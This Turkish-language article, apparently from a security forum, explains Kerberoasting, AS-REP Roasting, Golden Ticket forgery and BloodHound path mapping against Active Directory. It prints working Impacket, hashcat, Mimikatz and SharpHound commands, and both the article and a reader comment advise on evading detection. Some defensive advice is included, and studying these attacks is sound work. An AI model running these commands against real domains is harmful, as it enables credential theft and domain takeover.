Siber Alem / Detail / 230 / Active-directory-kerberos-saldirilari-kerberoasting-as-rep-roasting-ve-golden-ticket
technical_article_reader.sh
TECHNICAL PAPER / papers

Active Directory Kerberos Saldırıları: Kerberoasting, AS-REP Roasting ve Golden Ticket

2026-07-21
3 min read (569 words)
27 views

Araştırma Kategorisi • Active Directory Güvenliği

Active Directory Kerberos Saldırıları: Kerberoasting'den Golden Ticket'a

Kurumsal ağların bel kemiği olan Active Directory, Kerberos kimlik doğrulama protokolü üzerine inşa edilmiştir. Bu makalede Kerberoasting, AS-REP Roasting ve Golden Ticket saldırılarını adım adım ele alıyor; BloodHound ile saldırı yollarının nasıl haritalandığını gösteriyoruz.

1. Kerberos Protokolüne Hızlı Bakış

Kerberos, AD kimlik doğrulamasının temelini oluşturur. İş akışı üç adımda özetlenir: istemci TGT (Ticket Granting Ticket) alır, TGT ile servis bileti (TGS) talep eder, bileti servis sunucusuna sunar. Kritik nokta: TGS biletleri, servis hesabının NTLM hash'iyle şifrelenir.

[Kullanıcı] → AS-REQ → [DC: KDC] → AS-REP (TGT döner)
[Kullanıcı] → TGS-REQ (TGT + servis adı) → [DC: KDC] → TGS-REP (Servis Bileti)
[Kullanıcı] → AP-REQ (Servis Bileti) → [Hedef Servis]

2. Kerberoasting: Servis Hesabı Hashlerini Çevrimdışı Kırmak

Kerberoasting, SPN (Service Principal Name) atanmış servis hesaplarına ait TGS biletlerini talep edip bu biletleri çevrimdışında kırmaya dayanır. Domain'deki herhangi bir kimlik doğrulanmış kullanıcı bu bileti talep edebilir — özel bir yetki gerekmez.

Impacket ile Kerberoasting:

# SPN'li hesapları listele ve hash çek
python3 GetUserSPNs.py domain.local/low_priv_user:'Pass123!' -dc-ip 192.168.1.10 -request

# Çıktıdaki $krb5tgs$... hashini hashcat ile kır
hashcat -m 13100 -a 0 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

⚠ OPSEC Notu

Kerberoasting saldırısında EventID 4769 (Kerberos Service Ticket Requested) logu üretilir. RC4 yerine AES256 bilet talep ederek anomali tespitini zorlaştırabilirsiniz ancak daha yavaş kırılır. Microsoft ATA ve Defender for Identity bu davranışı izler.

3. AS-REP Roasting: Ön Kimlik Doğrulama Gerektirmeyen Hesaplar

Kerberos ön kimlik doğrulaması (pre-authentication) devre dışı bırakılan hesaplar için AS-REP Roasting uygulanır. Domain hesabı gerektirmez; yalnızca hesap adını bilmek yeterlidir.

# Domain hesabı olmadan AS-REP talebi
python3 GetNPUsers.py domain.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10

# Elde edilen krb5asrep hashini kır
hashcat -m 18200 asrep_hashes.txt rockyou.txt

4. Golden Ticket: Domain Üzerinde Kalıcı Kontrol

Golden Ticket, KRBTGT hesabının NTLM hash'ini kullanarak sahte, geçerli TGT biletleri oluşturmayı sağlar. Bu bileti elinde bulunduran saldırgan istediği kullanıcı adına — hatta var olmayan kullanıcılar adına — herhangi bir servise erişebilir. KRBTGT şifresi sıfırlanmadıkça bu erişim kalıcıdır.

# Mimikatz ile KRBTGT hash çek (Domain Admin yetkisi gerekir)
lsadump::dcsync /domain:domain.local /user:krbtgt

# Golden Ticket oluştur
kerberos::golden /user:FakeAdmin /domain:domain.local /sid:S-1-5-21-... /krbtgt:HASH /ptt

# Artık herhangi bir sunucuya erişebilirsiniz
dir \dc01\c$

🔴 Savunma — Golden Ticket Tespiti

KRBTGT şifresi en az 6 ayda bir iki kez sıfırlanmalıdır. Microsoft ATA, ömrü 10 yılı aşan biletleri anomali olarak işaretler. Event ID 4769 ve 4624 logları SIEM ile korelasyona alınmalıdır.

5. BloodHound ile Saldırı Yollarını Haritalandırma

BloodHound, AD'yi graph veritabanı olarak modelleyerek düşük yetkili kullanıcıdan Domain Admin'e giden gizli yolları görselleştirir. SharpHound ile veri toplanır, Neo4j veritabanına aktarılır.

# SharpHound ile veri toplama
./SharpHound.exe -c All --zipfilename ad_data.zip

# BloodHound Cypher sorgusu: Domain Admin'e en kısa yol
MATCH p=shortestPath((n:User {name:"user1@DOMAIN.LOCAL"})-[*1..]->(m:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}))
RETURN p

Makale Tartışmaları (1)

mu-b
USER
Rank: Script Kiddie
Posts: 10
Rep: 0
Joined: 2009-01
Rep Progress 0 / 500
2026-07-21 21:07:26 #1

Kerberoasting'i anlatırken OPSEC açısından kritik bir detay eklemek isterim: RC4 şifrelemesi yerine AES256 biletler talep etmek (--hash-type 18) EDR'lerin tespitini zorlaştırıyor. Ayrıca BloodHound Cypher'da 'Shortest Path to Domain Admin' sorgusu harika sonuçlar veriyor.

Yorum Yapmak İçin Giriş Yapın

Bu makaleye yorum yazmak ve tartışmaya katılmak için giriş yapmalısınız.

Siber Alem V1 Status: Operational | Exploits: 436 (156 Verified)
Ping: 18ms Lang: EN